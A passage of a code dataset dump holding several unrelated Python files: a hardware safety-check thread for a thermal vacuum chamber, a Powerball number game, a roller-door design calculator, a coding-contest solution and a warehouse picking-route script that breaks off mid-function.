seconds.\".format(end-start))","sub_path":"image2mosaic.py","file_name":"image2mosaic.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"449620171","text":"from threading import Thread\nimport time\nfrom datetime import datetime\nimport os\n\nfrom Collections.HardwareStatusInstance import HardwareStatusInstance\nfrom Collections.ProfileInstance import ProfileInstance\nfrom Logging.MySql import MySQlConnect\nfrom Logging.Logging import Logging\n\n\ndef releaseHoldThread():\n ProfileInstance.getInstance().inHold = False\n sql = \"UPDATE System_Status SET in_hold=0;\"\n mysql = MySQlConnect()\n try:\n mysql.cur.execute(sql)\n mysql.conn.commit()\n except Exception as e:\n Logging.debugPrint(3, \"sql: {}\".format(sql))\n Logging.debugPrint(1, \"Error in ThreadCollection, holdThread: {}\".format(str(e)))\n if Logging.debug:\n raise e\n\n\nclass SafetyCheck(Thread):\n \"\"\"\n SafetyCheck is the thread that runs the sanity and safety checks over the system.\n If it finds anything wrong with the system it makes an error report and stores it in a 
queue\n to be seen by the client.\n \"\"\"\n __instance = None\n\n def __init__(self, parent):\n if SafetyCheck.__instance != None:\n raise Exception(\"This class is a singleton!\")\n else:\n Logging.logEvent(\"Debug\", \"Status Update\",\n {\"message\": \"Creating SafetyCheck\",\n \"level\": 2})\n self.errorList = []\n self.errorDict = {\n \"System Alarm: High Temperature\": False,\n \"Product Saver Alarm: High Temperature\": False,\n \"Product Saver Alarm: Low Temperature\": False,\n \"Human Touch Alarm: High Temperature\": False,\n \"Human Touch Alarm: Low Temperature\": False,\n \"Raised Pressure While Testing\": False,\n }\n\n self.MAX_UUT_TEMP = {}\n self.MIN_UUT_TEMP = {}\n\n SafetyCheck.__instance = self\n self.parent = parent\n super(SafetyCheck, self).__init__()\n\n def run(self):\n # This should always stay on\n while True:\n # initialization of the safety Thread\n try:\n # Temps are in Kelvin\n MAX_OPERATING_TEMP = 437\n # safe at all lower bounds\n # MIN_OPERATING_TEMP\n\n MAX_TOUCH_TEMP = 318.15\n MIN_TOUCH_TEMP = 269.15\n\n # TODO, make this user defined\n # These are test values, they will change when the code is written to change them\n self.MAX_UUT_TEMP = {}\n self.MIN_UUT_TEMP = {}\n\n SLEEP_TIME = 1 # in seconds\n\n # Used to keep track of the first time through a loop\n vacuum = False\n\n hardwareStatusInstance = HardwareStatusInstance.getInstance()\n\n Logging.logEvent(\"Debug\", \"Status Update\",\n {\"message\": \"Starting Safety Checker Thread\",\n \"level\": 3})\n # stop when the program ends\n while True:\n Logging.logEvent(\"Debug\", \"Status Update\",\n {\"message\": \"Running Safety Checker Thread\",\n \"level\": 4})\n\n tempErrorDict = {\n \"System Alarm: High Temperature\": False,\n \"Product Saver Alarm: High Temperature\": False,\n \"Product Saver Alarm: Low Temperature\": False,\n \"Human Touch Alarm: High Temperature\": False,\n \"Human Touch Alarm: Low Temperature\": False,\n \"Pressure Loss In Profile\": False,\n }\n TCs = hardwareStatusInstance.Thermocouples.ValidTCs\n for tc in TCs:\n # if there are any TC's higher than max temp\n if tc.temp > MAX_OPERATING_TEMP:\n # print(\"{}-> {}\".format(tc.Thermocouple, tc.temp))\n errorDetail = \"TC # {} is above MAX_OPERATING_TEMP ({}). 
Currently {}c\".format(\n tc.Thermocouple, MAX_OPERATING_TEMP, tc.temp)\n error = {\n \"time\": str(datetime.now()),\n \"event\": \"System Alarm: High Temperature\",\n \"item\": \"Thermocouple\",\n \"itemID\": tc.Thermocouple,\n \"details\": errorDetail,\n \"actions\": [\"Turned off heater\", \"Log Event\"]\n }\n self.logEvent(error)\n tempErrorDict[error['event']] = True\n\n d_out = HardwareStatusInstance.getInstance().PC_104.digital_out\n ProfileInstance.getInstance().activeProfile = False\n Logging.debugPrint(1, \"ERROR Heat was above max operating temperature ({})\".format(tc.temp))\n vacuum = False\n d_out.update({\"IR Lamp 1 PWM DC\": 0})\n d_out.update({\"IR Lamp 2 PWM DC\": 0})\n d_out.update({\"IR Lamp 3 PWM DC\": 0})\n d_out.update({\"IR Lamp 4 PWM DC\": 0})\n d_out.update({\"IR Lamp 5 PWM DC\": 0})\n d_out.update({\"IR Lamp 6 PWM DC\": 0})\n d_out.update({\"IR Lamp 7 PWM DC\": 0})\n d_out.update({\"IR Lamp 8 PWM DC\": 0})\n d_out.update({\"IR Lamp 9 PWM DC\": 0})\n d_out.update({\"IR Lamp 10 PWM DC\": 0})\n d_out.update({\"IR Lamp 11 PWM DC\": 0})\n d_out.update({\"IR Lamp 12 PWM DC\": 0})\n d_out.update({\"IR Lamp 13 PWM DC\": 0})\n d_out.update({\"IR Lamp 14 PWM DC\": 0})\n d_out.update({\"IR Lamp 15 PWM DC\": 0})\n d_out.update({\"IR Lamp 16 PWM DC\": 0})\n\n HardwareStatusInstance.getInstance().TdkLambda_Cmds.append(['Shroud Duty Cycle', 0])\n HardwareStatusInstance.getInstance().TdkLambda_Cmds.append(['Platen Duty Cycle', 0])\n\n releaseHoldThread()\n # end of max operational test\n\n if tc.userDefined:\n # print(\"tc: {} zone: {}\".format(tc.Thermocouple,tc.zone))\n if tc.zone != 0:\n if tc.temp > ProfileInstance.getInstance().zoneProfiles.getZone(tc.zone).maxHeatError:\n errorDetail = \"TC # {} is above MAX_UUT_TEMP ({}). Currently {}c\".format(\n tc.Thermocouple,\n ProfileInstance.getInstance().zoneProfiles.getZone(tc.zone).maxHeatError,\n tc.temp)\n error = {\n \"time\": str(datetime.now()),\n \"event\": \"Product Saver Alarm: High Temperature\",\n \"item\": \"Thermocouple\",\n \"itemID\": tc.Thermocouple,\n \"details\": errorDetail,\n \"actions\": [\"Turned off heater\", \"Log Event\"]\n }\n self.logEvent(error)\n tempErrorDict[error['event']] = True\n # end of max user test\n\n if tc.temp < ProfileInstance.getInstance().zoneProfiles.getZone(tc.zone).minHeatError:\n errorDetail = \"TC # {} is below MIN_UUT_TEMP ({}). Currently {}c\".format(\n tc.Thermocouple,\n ProfileInstance.getInstance().zoneProfiles.getZone(tc.zone).minHeatError,\n tc.temp)\n error = {\n \"time\": str(datetime.now()),\n \"event\": \"Product Saver Alarm: Low Temperature\",\n \"item\": \"Thermocouple\",\n \"itemID\": tc.Thermocouple,\n \"details\": errorDetail,\n \"actions\": [\"Turned off LN flow\", \"Log Event\"]\n }\n self.logEvent(error)\n tempErrorDict[error['event']] = True\n # end of min user test\n # end of user test\n\n # Get the full list\n OutsideThermoCouples = []\n if tc.Thermocouple in OutsideThermoCouples:\n if tc.temp > MAX_TOUCH_TEMP:\n errorDetail = \"TC # {} is above MAX_TOUCH_TEMP ({}). Currently {}c\".format(\n tc.Thermocouple, MAX_TOUCH_TEMP, tc.temp)\n error = {\n \"time\": str(datetime.now()),\n \"event\": \"Human Touch Alarm: High Temperature\",\n \"item\": \"Thermocouple\",\n \"itemID\": tc.Thermocouple,\n \"details\": errorDetail,\n \"actions\": [\"Log Event\"]\n }\n self.logEvent(error)\n tempErrorDict[error['event']] = True\n # end of max touch test\n\n if tc.temp < MIN_TOUCH_TEMP:\n errorDetail = \"TC # {} is below MIN_TOUCH_TEMP ({}). 
Currently {}c\".format(\n tc.Thermocouple, MIN_TOUCH_TEMP, tc.temp)\n error = {\n \"time\": str(datetime.now()),\n \"event\": \"Human Touch Alarm: Low Temperature\",\n \"item\": \"Thermocouple\",\n \"itemID\": tc.Thermocouple,\n \"details\": errorDetail,\n \"actions\": [\"Log Event\"]\n }\n self.logEvent(error)\n tempErrorDict[error['event']] = True\n # end of min touch test\n # if of outside thermaltest\n # End of TC for loop\n\n for errorType in self.errorDict:\n # for every type of error\n if self.errorDict[errorType] and not tempErrorDict[errorType]:\n # It was true and now is not, log it.\n\n # make a event log\n errorLog = {\n \"time\": str(datetime.now()),\n \"event\": errorType,\n \"item\": \"Thermocouple\",\n \"itemID\": tc.Thermocouple,\n \"details\": \"The current event has ended\",\n \"actions\": [\"Log Event\"]\n }\n self.logEvent(errorLog)\n\n self.errorDict = tempErrorDict\n\n # Logging if you've entered operational vacuum, and then left it\n # TODO: OperationalVacuum can't be updated if there isn't an active profile...this needs to change\n if HardwareStatusInstance.getInstance().OperationalVacuum:\n vacuum = True\n\n if os.name == \"posix\":\n userName = os.environ['LOGNAME']\n else:\n userName = \"user\"\n if \"root\" in userName:\n if vacuum and HardwareStatusInstance.getInstance().PfeifferGuages.get_chamber_pressure() > 1e-4:\n d_out = HardwareStatusInstance.getInstance().PC_104.digital_out\n ProfileInstance.getInstance().activeProfile = False\n Logging.debugPrint(1, \"ERROR Pressure is above 10^-4. ({})\".format(\n HardwareStatusInstance.getInstance().PfeifferGuages.get_chamber_pressure()))\n vacuum = False\n # TODO: Send Error\n d_out.update({\"IR Lamp 1 PWM DC\": 0})\n d_out.update({\"IR Lamp 2 PWM DC\": 0})\n d_out.update({\"IR Lamp 3 PWM DC\": 0})\n d_out.update({\"IR Lamp 4 PWM DC\": 0})\n d_out.update({\"IR Lamp 5 PWM DC\": 0})\n d_out.update({\"IR Lamp 6 PWM DC\": 0})\n d_out.update({\"IR Lamp 7 PWM DC\": 0})\n d_out.update({\"IR Lamp 8 PWM DC\": 0})\n d_out.update({\"IR Lamp 9 PWM DC\": 0})\n d_out.update({\"IR Lamp 10 PWM DC\": 0})\n d_out.update({\"IR Lamp 11 PWM DC\": 0})\n d_out.update({\"IR Lamp 12 PWM DC\": 0})\n d_out.update({\"IR Lamp 13 PWM DC\": 0})\n d_out.update({\"IR Lamp 14 PWM DC\": 0})\n d_out.update({\"IR Lamp 15 PWM DC\": 0})\n d_out.update({\"IR Lamp 16 PWM DC\": 0})\n\n HardwareStatusInstance.getInstance().TdkLambda_Cmds.append(['Shroud Duty Cycle', 0])\n HardwareStatusInstance.getInstance().TdkLambda_Cmds.append(['Platen Duty Cycle', 0])\n\n releaseHoldThread()\n\n # end if vacuum in bad condintion\n # end if root\n time.sleep(SLEEP_TIME)\n # end of inner while true loop\n except Exception as e:\n Logging.debugPrint(1, \"Error in Safety Checker: {}\".format(str(e)))\n if Logging.debug:\n raise e\n time.sleep(SLEEP_TIME)\n # end of try/except\n\n # end of outer while true\n # end of run()\n\n def logEvent(self, error):\n errorInList = False\n if self.errorList:\n for tempError in self.errorList:\n if error[\"event\"] == tempError[\"event\"]:\n if error[\"item\"] == tempError[\"item\"]:\n if error['itemID'] == tempError['itemID']:\n errorInList = True\n if not errorInList:\n # debugPrint(1, error[\"details\"])\n self.errorList.append(error)\n # print(self.errorList)\n\n Logging.debugPrint(4, \"Running Safety Checker Thread\")\n # Not sure what to do with this\n if not self.errorDict[error[\"event\"]]:\n # The error has not been on, and is now on\n # Log SQL stuff\n 
pass\n","sub_path":"Sites/ThreadControls/SafetyCheck.py","file_name":"SafetyCheck.py","file_ext":"py","file_size_in_byte":15582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"528815723","text":"\"\"\"\nPowerball story:\nAs a Greenphire employee I would like to add my favorite 6 numbers to consider\nfor a Powerball entry ticket so that I can win 1 billion dollars.\n\n • Capture the name of the employees entering the number.\n • The first 5 favorite numbers will need to be in the range of 1 to 69 and\n unique. (remember that this is a drawing so there cannot be duplicates\n in this range of 5 numbers)\n • 6th favorite number will need to be in the range of 1 to 26 and flagged\n as the 6th Powerball number.\n • Keep count of each individual favorite number provided to determine\n which numbers to use in our final winning number. (i.e. count the\n duplicates).\n • Retrieve the max count of each unique duplicate number and use them as\n the Powerball numbers.\n • if there is a tie based on the max counts randomly select the tied\n number.\n • Display all employees with their corresponding number entries.\n • Display the final Powerball number based on the requirements above.\n\nSample output:\nEnter your first name: Wade\nEnter your last name: Wilson\nselect 1st # (1 thru 69): 12\nselect 2nd # (1 thru 69 excluding 12): 20\nselect 3rd # (1 thru 69 excluding 12 and 20): 23\nselect 4th # (1 thru 69 excluding 12, 20, and 23: 56\nselect 5th # (1 thru 69 excluding 12, 20, 23, and 56: 30\nselect Power Ball # (1 thru 26): 25\n\nWade Wilson 15 26 33 60 34 Powerball: 16\nFrank Castle 15 26 34 56 61 Powerball: 16\n\nPowerball winning number:\n15 26 34 55 63 Powerball: 16\n\"\"\"\nfrom random import shuffle\nfrom random import choice\nfrom random import sample\nfrom collections import Counter\nfrom collections import namedtuple\n\nball_set_69 = [i for i in range(1, 70)]\nball_set_26 = [i for i in range(1, 27)]\n\n\nclass Player():\n\n def __init__(self, first_name=None, last_name=None, white_balls=None,\n power_ball=None):\n if any((first_name is None, last_name is None, white_balls is None,\n power_ball is None)):\n q_vars = {0: 'Select 1st # (1 thru 69): ',\n 1: 'Select 2nd # (1 thru 69 excluding {}): ',\n 2: 'Select 3rd # (1 thru 69 excluding {} and {}): ',\n 3: 'Select 4th # (1 thru 69 excluding {}, {}, and {}): ',\n 4: 'Select 5th # (1 thru 69 excluding {}, {}, {}, and {}): '}\n\n def ask_white_ball_number():\n return input(q_vars[len(self.white_balls)]\n .format(*self.white_balls))\n\n def ask_power_ball_number():\n return input('Select Power Ball # (1 thru 26): ')\n\n def ask_number(question):\n num = question()\n while not num.isnumeric():\n print(\"Please enter number only. 
Let's try again.\")\n num = question()\n return num\n\n self.first_name = input('Enter your first name: ')\n self.last_name = input('Enter your last name: ')\n self.white_balls = []\n # player is choosing 5 different white balls\n ball = 0\n while len(self.white_balls) < 5:\n while (not int(ball) in ball_set_69 or\n int(ball) in self.white_balls):\n ball = ask_number(ask_white_ball_number)\n self.white_balls.append(int(ball))\n # player is choosing a powerball\n ball = 0\n while not int(ball) in ball_set_26:\n ball = ask_number(ask_power_ball_number)\n self.power_ball = int(ball)\n else:\n self.first_name = first_name\n self.last_name = last_name\n self.white_balls = white_balls\n self.power_ball = power_ball\n\n def __repr__(self):\n return '{} {} - {} {} {} {} {} Powerball: {}'.format(self.first_name,\n self.last_name,\n *self.white_balls,\n self.power_ball)\n\n\nclass PowerBallGame():\n\n def __init__(self, num_of_console_player=1, num_of_random_player=9):\n \"\"\"\n To make testing process for this program is easier I have added the\n facility of random generation of player's data. During the class\n initialiazation you have to indicate how many players will input data\n by console, and how many of test players will be generated randomly\n \"\"\"\n first_names = ['Emma', 'Noah', 'Olivia', 'Liam', 'Sophia', 'Mason',\n 'Ava', 'Jacob', 'Isabella', 'William', 'Mia', 'Ethan',\n 'Abigail', 'James', 'Emily', 'Alexander', 'Charlotte',\n 'Michael', 'Harper', 'Benjamin']\n last_names = ['Smith', 'Johnson', 'Williams', 'Jones', 'Brown',\n 'Davis', 'Miller', 'Wilson', 'Moore', 'Taylor',\n 'Anderson', 'Thomas', 'Jackson', 'White', 'Harris',\n 'Martin', 'Thompson', 'Garcia', 'Martinez', 'Robinson']\n balls_set = namedtuple('set', ['n_times', 'balls'])\n counter_69 = Counter()\n counter_26 = Counter()\n\n self.players = []\n # add players from console\n for i in range(0, num_of_console_player):\n self.players.append(Player())\n # add random players\n for i in range(0, num_of_random_player):\n self.players.append(Player(choice(first_names),\n choice(last_names),\n sample(ball_set_69, 5),\n choice(ball_set_26)))\n # counting of balls ---------------------------------------------------\n for player in self.players:\n # count how many times (n_times) each white ball was selected\n for ball in player.white_balls:\n counter_69[ball] += 1\n # count how many times (n_times) each powerball was selected\n counter_26[player.power_ball] += 1\n\n def list_of_balls(counter):\n # creation of the list of balls sorted in times' of selection descending order\n balls_list = {}\n for ball, n_times in counter.items():\n if n_times in balls_list:\n balls_list[n_times].append(ball)\n else:\n balls_list[n_times] = [ball]\n balls_list = [balls_set(n_times, ball)\n for n_times, ball in balls_list.items()]\n balls_list.sort(key=lambda x: x.n_times, reverse=True)\n return balls_list\n\n self.balls_69_count = list_of_balls(counter_69)\n self.balls_26_count = list_of_balls(counter_26)\n\n # generation of final balls -------------------------------------------\n def add_ball(add_from, add_to):\n balls = list(set(add_from)-set(add_to))\n if len(balls) != 0:\n add_to.append(choice(balls))\n return add_to\n\n final_balls = []\n # choosing of final white balls\n for balls_list in self.balls_69_count:\n # don't take balls which were chosen only once\n if balls_list.n_times != 1:\n # shuffle balls\n shuffle(balls_list.balls)\n for ball in balls_list.balls:\n final_balls.append(ball)\n while len(final_balls) < 5:\n final_balls = 
add_ball(ball_set_69, final_balls)\n self.final_balls = sorted(final_balls[:5])\n # choosing of final power ball\n if self.balls_26_count[0].n_times == 1:\n self.final_balls.append(choice(ball_set_26))\n else:\n self.final_balls.append(choice(self.balls_26_count[0].balls))\n\n def players_list(self):\n # create formatted list of all players\n max_name_length = max([len(player.first_name) + len(player.last_name)\n for player in self.players])\n border_length = max_name_length + 34\n final_list = '-'*border_length+'\\n'\n for player in self.players:\n # player's first name and last name\n final_list += '{} {} {}- '.format(player.first_name,\n player.last_name,\n ' '*(max_name_length -\n (len(player.first_name) +\n len(player.last_name))))\n # white balls\n final_list += '{} {} {} {} {} '.format(*[ball\n if ball > 9\n else ' '+str(ball)\n for ball\n in player.white_balls])\n # Powerball\n final_list += '- Powerball: {}\\n'.format(player.power_ball\n if player.power_ball > 9\n else ' '+str(player.power_ball))\n final_list += '-'*border_length\n return final_list\n\n def view_final_powerball(self):\n return ('Powerball winning numbers:\\n'\n '{} {} {} {} {} Powerball: {}').format(*self.final_balls)\n\n\nif __name__ == '__main__':\n # you can set number of players like this: PowerBallGame(2, 8)\n # 2 players from console and 8 randomly generated\n game = PowerBallGame()\n print(game.players_list())\n print(game.view_final_powerball())\n # Additional info\n print('\\n\\nBalls count information (white balls):')\n print('- '*25)\n print(*game.balls_69_count, sep='\\n')\n print('\\nBalls count information (powerball):')\n print('- '*25)\n print(*game.balls_26_count, sep='\\n')\n","sub_path":"powerball.py","file_name":"powerball.py","file_ext":"py","file_size_in_byte":9921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"372884844","text":"'''This program calculates roller door design parameters based on drum diameter, slat size and installed height, motor etc.'''\n\nimport math\n\n#Input Geometry:\ndoor_number = 62\ndescription = 'Maintenance shop'\nopening_height = 4820 #(mm)\nopening_width = 8256 #(mm)\ndrum_height= 5000 #(mm)\n\ndrum_type = 1 #enter 1 or 2 for 219x9.5 or 219x12.7 drums respectively\nslat_type = 2 #enter 1,2 or 3 for 75,100 or 125 slats respectively\nbrake_type = 1 #enter 1 or 2 for FG-120-50 or FG220-60 respectively\ndrive_sprocket_type = 1\nchainwheel_type = 3\nmotor_type = 2\n\nbottom_rail = 3 #(kg/m)\nslat_info = {1:[75,40, 'NA'], 2:[100,46,15], 3:[125,46,'NA']} #slat_type[slat length, slat dia. buildup/roll, weight/m^2]\ndrum_info = {1:[219,9.5], 2:[219,12.7]} #drum_type [OD, t, weight/m (kg)]\nbrake_info = {1:['FG-120-50',3.53, 50,], 2:['FG220-60', 6.7]} #brake_type [brake name, max. braking torque(kN.m), axle dia. 
(mm), weight (kg)]\nsprocket_info = {1:[15], 2: [38], 3: [45]} #chainwheel_type[sprocket teeth, pitch (mm), thickness (mm)]\nmotor_info = {1:['KE40.24', 400, 28], 2:['KE60.24', 600, 47], 3:['KE80.24',800,49]} #motor type [part, output torque (N.m), weight (kg)]\n\nprint('Door Number = ',door_number,'\\nDescription = ',description)\n\n\ndef curtain (slat_info, drum_height, drum_info, opening_width, bottom_rail):\n #Get required data\n f_sy=250 #(MPa)\n slat_geom = slat_info.get(slat_type) #print(slat_geom)\n slat_increase = slat_geom[1] #print(slat_increase)\n slat_weight = slat_geom[2]\n drum_geom = drum_info.get(drum_type)\n drum_OD = drum_geom[0]\n drum_t = drum_geom[1]\n drum_ID = drum_OD-2*drum_t\n #drum_unitweight = drum_geom[2]\n drum_unitweight = ((math.pi*((drum_OD**2)-(drum_ID**2)))/4)*7850*1e-6\n #print('Drum unit weight=', drum_unitweight)\n\n #---Calculate circumference for each roll until the required length is achieved---#\n rolled_length=0\n x=slat_increase\n i=1 #number of turns on drum\n while drum_height >= rolled_length:\n dia_curtain = drum_OD+(i*x)\n circumference = math.pi*dia_curtain\n rolled_length = rolled_length + circumference\n #print('Turn No. =', i)\n #print ('Rolled length =',rolled_length)\n #print('Rolled Curtain Diameter =',dia_curtain)\n i+=1\n excess = rolled_length-drum_height #amount of roll left on drum when door reaches the ground.\n\n #---Calculate Drum and Curtain Weights and Check Drum Strength ---#\n drum_mass = drum_unitweight*opening_width*1e-3*(9.81/1000) #(kN)\n curtain_mass = ((rolled_length*opening_width* 1e-6 * slat_weight)+(opening_width*1e-3*bottom_rail))*(9.81/1000) # (kN)\n #Check drum for service and strength limits states:\n drum_Ix = (math.pi*((drum_OD**4)-(drum_ID**4))/64)# (mm^4)\n #print('drum Ix =',drum_Ix)\n drum_Z = (2*drum_Ix)/drum_OD # (mm^3)\n #print('drum Z =',drum_Z)\n w_service=(drum_mass+curtain_mass)/(opening_width/1000) #(N/mm)\n #print('Service UDL =',w_service)\n M_ult_drum = 1.2* w_service*((opening_width*1e-3)**2)/8 #(kN.m)\n #print('Ultimate moment=',M_ult_drum)\n service_deflection= (5/384)*((w_service*opening_width**4)/(200000*drum_Ix))\n Phi_M_drum = 0.9*f_sy*drum_Z *1e-6 #(kN.m)\n print('Drum bending capacity',Phi_M_drum)\n drum_bendingSF = Phi_M_drum/M_ult_drum\n return (dia_curtain, rolled_length, excess, drum_mass, curtain_mass, service_deflection, drum_bendingSF)\n\ndef driveloads(sprocket_info, chainwheel_type, drive_sprocket_type, motor_info, motor_type):\n drive_sprocket_geom = sprocket_info[drive_sprocket_type]\n drive_sprocket_PCD = (drive_sprocket_geom[0]*25.4/math.pi)\n drive_sprocket_OD = drive_sprocket_PCD+10\n chainwheel_geom = sprocket_info[chainwheel_type]\n chainwheel_PCD = (chainwheel_geom[0]*25.4/math.pi)\n chainwheel_OD = chainwheel_PCD + 10\n motor_data = motor_info[motor_type]\n motor_torque = motor_data[1]\n motor_weight = motor_data[2]\n chain_tension = 2*motor_torque/drive_sprocket_PCD\n #print('Chain tension = ', chain_tension)\n return (drive_sprocket_OD, chainwheel_OD,chain_tension)\n\ncurtain_results=curtain(slat_info, drum_height, drum_info, opening_width, bottom_rail)\nprint('Curtain rolled diameter = {0:.2f}mm \\n'\n 'Curtain rolled length = {1:.2f}mm \\n'\n 'Excess curtain on roll when door is closed {2:.2f}mm\\n'\n 'Drum m.g = {3:.2f}kN\\n'\n 'Curtain (including bottom rail) m.g = {4:.2f}kN\\n'\n 'Drum Deflection = {5:2f}\\n'\n 'Drum Strength Safety Factor = {6:2f}'.format(*curtain_results))\n\nload_results = driveloads(sprocket_info, chainwheel_type, drive_sprocket_type, 
motor_info, motor_type)\nprint('Drive sprocket OD = {0:.2f}mm \\n'\n 'Chainwheel OD = {1:.2f}mm \\n'\n 'Chain tension {2:.2f}kN'.format(*load_results))\n\n\n\n\n","sub_path":"Roller Doors/Door Diameter.py","file_name":"Door Diameter.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"547616062","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2013 NetApp, Inc.\n# All rights reserved.\n#\n\"\"\"\n\"\"\"\n# IMPORTANT\n# Run as \n# python template.py < A-small-practice.in >& A-small-practice.out\n\nfrom __future__ import print_function\nimport argparse\nimport getpass\nimport glob\nimport imp\nimport itertools\nimport logging\nimport pkg_resources\nimport pkgutil\nimport sys\nimport re\nimport ystockquote\nimport requests\nimport threading\nfrom multiprocessing import Process\nimport time\nimport bisect\n\n\n# This function will take a certain number, and generate the 'base' representation\n# of it. And it will output that in the form of a array ..\n# you have to provide how many 'bits' you want .. if there are excess, the leading\n# ones will be zero.\ndef convert_number_to_bit_string(number, num_bits, base=2):\n string_bits = [0 for i in range(num_bits)]\n index = len(string_bits) - 1\n while index >= 0:\n string_bits[index] = number%base\n number = number / base\n index = index -1\n return string_bits\n\n#USE THE function bisect.insort() whenever necessary\n#If a is sorted in ascending order, e.g a = [5, 7, 10, 17]\n# bisect.insort(a, 12) will insert 12 into the sorted array using binary search.\n# bisect.insort(a, 12) will result in [5, 7, 10, 12, 17]\n\nlogger = logging.getLogger(__name__)\n\ndef main():\n streamformat = \"%(message)s\"\n logging.basicConfig(level=logging.INFO,\n format=streamformat)\n data = sys.stdin.readlines()\n i = 0\n nums = [int(n) for n in data[i].split()]\n num_test_cases = nums[0]\n for j in range(num_test_cases):\n i = i + 1\n nums = [int(n) for n in data[i].split()]\n X = nums[0]\n R = nums[1]\n C= nums[2]\n temp_r = R\n if R > C:\n R = C\n C = temp_r \n answer = None\n if X == 1:\n answer = \"GABRIEL\"\n elif X == 2:\n if (R*C)%2 == 0:\n answer = \"GABRIEL\"\n else:\n answer = \"RICHARD\"\n elif X == 3:\n if (R*C)%3 != 0:\n answer = \"RICHARD\"\n elif ((C == 3 and R == 1) or (C==4 and R == 2)):\n answer = \"RICHARD\"\n else:\n answer = \"GABRIEL\"\n elif X == 4:\n if (R*C)%4 != 0:\n answer = \"RICHARD\"\n elif ((C == 2 and R == 2) or (C==4 and R == 1) or (C==4 and R ==2)):\n answer = \"RICHARD\"\n else:\n answer = \"GABRIEL\"\n logger.info(\"Case #{0}: {1}\".format(j+1, answer))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"solutions_5658571765186560_0/Python/chaitany/ominos.py","file_name":"ominos.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"132407991","text":"import ast\nimport csv\nimport math\nimport numpy\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib import style\n\nDEBUGMODE = True\nfrom modules import dijkstra\nfrom itertools import permutations\nimport scipy\n\nwith open(\"/home/pelin/Documents/poi_opt/new_segments_v2.poi\", \"r\") as segment_txt:\n segments = ast.literal_eval(segment_txt.read())\n\nlookup = {}\n# with open(\"./database/lookup_v2.csv\", newline='') as lookup_fp:\n# lookup_csv = csv.reader(lookup_fp, delimiter=' ', quotechar='|')\n# for index, row in enumerate(lookup_csv):\n# 
if index != 0:\n# splitted_row = row[0].split(\";\")\n# source = splitted_row[0]\n# dest = splitted_row[1]\n# dist = float(splitted_row[2])\n# path = ast.literal_eval(splitted_row[3])\n# if source not in lookup:\n# lookup.update({source: {}})\n# lookup[source].update({dest: {\"length\": dist, \"route\": path}})\n\n\norderLots = {}\norderLots_original = {}\nwith open(\"/home/pelin/Documents/poi_opt/18_temmuz_new_point.csv\", newline='') as subat:\n lots = csv.reader(subat, delimiter=' ', quotechar='|')\n for index, row in enumerate(lots):\n if index != 0:\n splitted_row = row[0].split(\",\")\n source = splitted_row[2].split(\"-\")\n source[1] = \"{:0>2d}\".format(int(source[1]))\n source = \"-\".join(source)\n if int(splitted_row[0]) not in orderLots:\n orderLots.update({int(splitted_row[0]): []})\n orderLots_original.update({int(splitted_row[0]): {\"route\": [], \"length\": []}})\n orderLots[int(splitted_row[0])].append({\"lot\": source, \"weightGroup\": int(splitted_row[3])})\n orderLots_original[int(splitted_row[0])][\"route\"].append(source)\n\npoint_lookup = {}\nwith open(\"/home/pelin/Documents/poi_opt/points_lookup.csv\", newline='') as lookup_fp:\n lookup_pt = csv.reader(lookup_fp, delimiter=' ', quotechar='|')\n for index, row in enumerate(lookup_pt):\n if index != 0:\n splitted_row = row[0].split(\",\")\n corridor = splitted_row[0]\n old_point = splitted_row[1].split(\"-\")\n old_point[1] = \"{:0>2d}\".format(int(old_point[1]))\n old_point = \"-\".join(old_point)\n\n new_point = splitted_row[2].split(\"-\")\n new_point[1] = \"{:0>2d}\".format(int(new_point[1]))\n new_point = \"-\".join(new_point)\n\n lon = float(splitted_row[3])\n lat = float(splitted_row[4])\n if new_point not in point_lookup:\n point_lookup.update({new_point: []})\n point_lookup[new_point] = {\"koridor\": corridor,\n \"old_point\": old_point,\n \"lon\": lon,\n \"lat\": lat}\n\nsegment_graph = {}\nlotsFilteredMap = {}\navailableWeightGroups = []\nlotsFiltered = []\n\n\ndef mapData(order_id=4021374429): # 4021334198\n global availableWeightGroups, lotsFilteredMap, lotsFiltered\n print(\"SETTING UP DATA\") if DEBUGMODE else None\n for seg in segments:\n if seg[\"start\"] not in segment_graph:\n segment_graph.update({seg[\"start\"]: {}})\n segment_graph[seg[\"start\"]].update({seg[\"end\"]: {\"length\": seg[\"length\"]}})\n\n lotsFiltered = orderLots[order_id]\n print(\"Filtered Work Order Content:\\n {}\".format(lotsFiltered)) if DEBUGMODE else None\n\n for picked in lotsFiltered:\n lotsFilteredMap.update({picked[\"weightGroup\"]: {}}) if picked[\"weightGroup\"] not in lotsFilteredMap else None\n koridor = point_lookup[picked[\"lot\"]][\"koridor\"]\n if koridor not in lotsFilteredMap[picked[\"weightGroup\"]]:\n lotsFilteredMap[picked[\"weightGroup\"]].update({koridor: []})\n lotsFilteredMap[picked[\"weightGroup\"]][koridor].append(picked[\"lot\"])\n\n for weight in lotsFilteredMap:\n for cor in lotsFilteredMap[weight]:\n lotsFilteredMap[weight][cor] = sorted(lotsFilteredMap[weight][cor], key=lambda pick: point_lookup[pick][\"lon\"])\n print(\"Sorted Corridor: weight: {}, Corridor: {}, Order: {}\".format(weight, cor, lotsFilteredMap[weight][cor]))\n\n # print(\"Corridor ve Weight Dictionary: {}\".format(lotsFilteredMap)) if DEBUGMODE else None\n availableWeightGroups = list(lotsFilteredMap.keys())\n availableWeightGroups.sort()\n availableWeightGroups.reverse()\n # print(\"Available Weigth Groups: {}\".format(availableWeightGroups)) if DEBUGMODE else None\n\n\ndef getOriginalRoute(start_point, path, graph):\n route 
